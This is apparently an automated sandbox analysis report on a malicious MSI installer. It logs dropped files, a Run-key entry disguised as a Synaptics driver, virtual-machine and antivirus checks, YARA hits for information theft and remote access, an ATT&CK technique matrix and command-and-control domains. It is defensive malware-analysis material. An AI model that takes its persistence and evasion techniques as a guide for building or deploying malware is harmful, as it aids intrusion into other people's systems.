                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\ProgramData\Synaptics\RCX49C5.tmpJump to dropped file
                              Source: C:\Windows\Installer\MSI4755.tmpFile created: C:\Windows\SysWOW64\._cache_MSI4755.tmpJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4755.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\EEGWXUHVUG\~$cache1Jump to dropped file
                              Source: C:\Windows\Installer\MSI4755.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpDropped PE file which has not been started: C:\Windows\SysWOW64\._cache_MSI4755.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5980Thread sleep time: -1020000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8088Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\userJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Amcache.hve.12.drBinary or memory string: VMware
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000004.00000002.2395079370.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000004.00000002.2395079370.0000000000793000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWvf
                              Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                              Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Synaptics.exe, 00000004.00000002.2395079370.000000000074A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                              Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Windows\Installer\MSI4755.tmpProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: valyzt.msi, type: SAMPLE
                              Source: Yara matchFile source: 3.0.MSI4755.tmp.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: MSI4755.tmp PID: 1124, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6520, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX49C5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4699.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\674551.msi, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4755.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: valyzt.msi, type: SAMPLE
                              Source: Yara matchFile source: 3.0.MSI4755.tmp.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.2105707960.0000000000773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000000.2035344533.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: MSI4755.tmp PID: 1124, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 6520, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\Documents\EEGWXUHVUG\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX49C5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4699.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\674551.msi, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI4755.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information41
                              Scripting
                              2
                              Replication Through Removable Media
                              Windows Management Instrumentation41
                              Scripting
                              11
                              Process Injection
                              132
                              Masquerading
                              OS Credential Dumping1
                              Query Registry
                              Remote ServicesData from Local System1
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              Registry Run Keys / Startup Folder
                              1
                              Registry Run Keys / Startup Folder
                              11
                              Virtualization/Sandbox Evasion
                              LSASS Memory111
                              Security Software Discovery
                              Remote Desktop ProtocolData from Removable Media3
                              Ingress Tool Transfer
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Process Injection
                              Security Account Manager1
                              Process Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive3
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                              Extra Window Memory Injection
                              1
                              Obfuscated Files or Information
                              NTDS11
                              Virtualization/Sandbox Evasion
                              Distributed Component Object ModelInput Capture34
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Software Packing
                              LSA Secrets11
                              Peripheral Device Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              DLL Side-Loading
                              Cached Domain Credentials3
                              File and Directory Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSync13
                              System Information Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              Extra Window Memory Injection
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582346 Sample: valyzt.msi Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 44 freedns.afraid.org 2->44 46 xred.mooo.com 2->46 48 7 other IPs or domains 2->48 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Antivirus detection for URL or domain 2->60 64 11 other signatures 2->64 9 msiexec.exe 8 33 2->9         started        13 EXCEL.EXE 231 66 2->13         started        15 Synaptics.exe 2->15         started        17 msiexec.exe 2 2->17         started        signatures3 62 Uses dynamic DNS services 44->62 process4 file5 38 C:\Windows\Installer\MSI4755.tmp, PE32 9->38 dropped 40 C:\Windows\Installer\MSI4699.tmp, data 9->40 dropped 42 C:\Windows\Installer\674551.msi, Composite 9->42 dropped 80 Drops executables to the windows directory (C:\Windows) and starts them 9->80 19 MSI4755.tmp 1 5 9->19         started        signatures6 process7 file8 30 C:\Windows\SysWOW64\._cache_MSI4755.tmp, PE32 19->30 dropped 32 C:\ProgramData\Synaptics\Synaptics.exe, PE32 19->32 dropped 34 C:\ProgramData\Synaptics\RCX49C5.tmp, PE32 19->34 dropped 66 Antivirus detection for dropped file 19->66 68 Multi AV Scanner detection for dropped file 19->68 70 Machine Learning detection for dropped file 19->70 23 Synaptics.exe 54 19->23         started        signatures9 process10 dnsIp11 50 drive.usercontent.google.com 142.250.186.129, 443, 